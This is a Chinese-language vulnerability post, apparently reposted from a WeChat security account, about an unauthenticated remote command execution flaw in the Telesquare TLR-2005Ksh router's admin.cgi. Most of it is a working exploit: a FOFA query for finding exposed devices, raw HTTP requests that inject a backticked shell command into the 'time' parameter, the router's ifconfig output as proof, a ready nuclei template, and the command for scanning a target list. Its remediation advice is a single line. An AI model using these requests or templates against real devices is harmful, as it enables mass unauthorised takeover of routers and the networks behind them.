【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

admin

102673
文章

87
评论

2023年12月18日15:03:55评论152 views字数 2552阅读8分30秒阅读模式

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞影响

Telesquare TLR-2005Ksh 路由器

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞描述

Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款路由器。该路由器admin.cgi接口处存在RCE漏洞，未经授权的攻击者可以远程执行任意命令，会导致主机失陷。

—

FOFA搜索语句

app="TELESQUARE-TLR-2005KSH"

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

漏洞复现

第一步：向靶场发送如下数据包，在靶场执行ifconfig命令，并将执行结果写入文件test28256.txt

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/xmlDate: Mon, 27 Nov 2023 03:32:28 GMTServer: lighttpd/1.4.20

第二步：访问我们生成的文件

GET /cgi-bin/test28256.txt HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 2283Accept-Ranges: bytesContent-Type: text/plainDate: Mon, 27 Nov 2023 03:32:28 GMTEtag: "-1081099397"Last-Modified: Mon, 27 Nov 2023 03:32:28 GMTServer: lighttpd/1.4.20
br0       Link encap:Ethernet  HWaddr D8:19:CE:02:E0:A7          inet addr:192.168.86.128  Bcast:192.168.86.1  Mask:255.255.255.248          inet6 addr: fe80::da19:ceff:fe02:e0a7/64 Scope:Link          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:11826278 errors:0 dropped:0 overruns:0 frame:0          TX packets:12297021 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:5237149421 (4.8 GiB)  TX bytes:2617831822 (2.4 GiB)
lo        Link encap:Local Loopback          inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:0 errors:0 dropped:0 overruns:0 frame:0          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

漏洞复现成功

—

nuclei poc

poc文件内容如下

id: Telesquare-TLR-2005Ksh-admin-rceinfo:  name: Telesquare TLR-2005Ksh 路由器 RCE漏洞  author: fgz  severity: critical  description: Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款路由器。该路由器admin.cgi接口处存在RCE漏洞，未经授权的攻击者可以远程执行任意命令，会导致主机失陷。  metadata:    max-request: 3    verified: true    fofa-query: app="TELESQUARE-TLR-2005KSH"
http:  - method: GET    path:      - "{{BaseURL}}/cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>{{randstr}}.txt`"  - method: GET    path:      - "{{BaseURL}}/cgi-bin/{{randstr}}.txt"    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'Link encap:')"

运行POC

nuclei.exe -t mypoc/其他/Telesquare-TLR-2005Ksh-admin-rce.yaml -l data/Telesquare-TLR-2005Ksh.txt

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

—

修复建议

升级到最新版本。

原文始发于微信公众号（AI与网安）：【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

【0day】Telesquare TLR-2005Ksh 路由器 admin.cgi RCE漏洞

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

YzmCMS pay_callback.html存在远程命令执行漏洞

WordPress Automatic插件存在SQL注入漏洞(CVE-2024-27956)

onethink安全漏洞(CVE-2024-33443)

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

发表评论